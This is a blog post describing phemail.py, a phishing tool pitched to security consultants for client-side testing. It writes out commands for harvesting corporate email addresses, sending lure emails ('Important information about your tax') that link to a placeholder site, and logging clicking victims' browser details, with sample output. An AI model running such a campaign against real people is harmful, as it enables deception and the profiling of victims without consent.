Phemail.py - Another Social Engineering Tool!

Social Engineering is defined as the process of inducing people into giving away access or confidential information.

From a security consultant point of view this topic is not new and there are many tools which can be used against the target. Probably the most popular social engineering tool is SET (http://www.social-engineer.org/framework/…), the Social Engineering Toolkit. SET is a Python script which attempts to automate all the processes required during a typical client-side test. What you can do with SET is send a phishing email with a malicious URL. The malicious URL will redirect the user to a webserver managed by Metasploit which will launch several exploits in order to exploit the victim’s web browser, to gain a Meterpreter shell. The problem of this approach is that most of the time Meterpreter will be detected by antivirus software running on the victim’s machine, so a successful exploitation is not going to be completed. Moreover so far SET doesn’t have any option to prove who clicked on the phishing email without using Meterpreter.

So for this reason I started to develop phemail.py - Phishing EMAIL. The main purpose of this tool is to prove who clicked on the phishing email without attempting to exploit the web browser but collecting as much information as possible. For this reason it will be 100% undetectable by any antivirus and it will obtain sufficient data to have an initial proof of concept for the client.

The first step is to find corporate email addresses. Phemail has an option for harvesting corporate email addresses on search engines and save these into a file as shown in the example below:

# phemail.py -g1@example.com
Gathering emails from domain: example.com
100% Completed!
test@example.com
test2@example.com
[…]
emails.txt updated

Once you have corporate email addresses the next step is to create a phishing email template. The template needs to have string “{0}” in each URL as the script will replace this string with the correct URL automatically. A real example used during a client side testing is shown below:

Then you need to install php on the web server and copy the php file “index.php” - that you will find inside the package at the bottom of this article - in the web root directory. This file contains Javascript code which attempts to collect web browser information and save it in a log file in /tmp directory.

After this you are ready to run the script specifying with the option” –w” the webserver where the php file “index.php” is uploaded as shown in the following example:

# phemail.py -e test-emails.txt -f "Fast Holiday " -r "Fast Holiday " -s "Last Minute Holiday" -b body.txt -w http://YOUR-WEBSITE.com

SMTP server: mail.example.com
Sent to test@example.com
Error: sending to notExist-email@example.com
Phishing URLs point to http://YOUR-WEBSITE.com
Phemail.py log file saved: phemail-log-12-07-2012_15-42.txt

Then you need to wait and hopefully if someone clicks on the phishing email you will gain some web browser information from the victim as below:

Email: test@example.com
Date: Thu 12/07/2012 11:00:13
IP: 192.168.0.123
User Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:13.0) Gecko/20100101 Firefox/13.0.1
appCodeName: Mozilla
appName: Netscape
appVersion: 5.0 (Windows)
appMinorVersion: undefined
product: Gecko
cookieEnabled: true
cpuClass: undefined
onLine: true
opsProfile: undefined
userProfile: undefined
language: en-US
platform: Win32
systemLanguage: undefined
userLanguage: undefined
flash: Enabled
Plugins:
Google Update
Shockwave Flash 11.3 r300
Google Talk Plugin Video Accelerator version:0.1.44.16
Version 3.1.4.8140
5.1.10411.0
Adobe PDF Plug-In For Firefox and Netscape 10.1.3
NPRuntime Script Plug-in Library for Java™ Deploy
Vmware Remote Console and Client Integration Plug-in
BlackBerry WebSL Browser Plug-In
Bing Bar
The plug-in allows you to open and edit files using Microsoft Office applications
Office Authorization plug-in for NPAPI browsers

The code is available for download as phemail.zip.

Steps to use Phemail.py:

Find corporate email addresses: Phemail has an option for harvesting corporate email addresses and save them to a file. Phemail.py leverages Google to search for LinkedIn specific corporate e-mail targets.

Create a phishing email template: You get to create your own custom phishing templates. Do not forget to add the string “{0}” in each URL as the script will replace this string with the correct URL automatically.

Host/upload a single PHP file: This file contains JavaScript code which attempts to collect web browser information and save it in a log file in /tmp directory.

Run the php file as shown in the following example:

# phemail.py -e test-emails.txt -f "Tax report " -r "Tax Report " -s "Important information about your tax" -b body.txt -w http://YOUR-WEBSITE.com

All you then you need to wait and hoping for the victim to click on the phishing email, allowing you to gain some web browser information from the victim as below.

When it comes to Python dependencies, the open sourcephemail.py requires pyDNS, BeautifulSoup in addition to smtplib, base64, os, sys, getopt, urllib2 and re.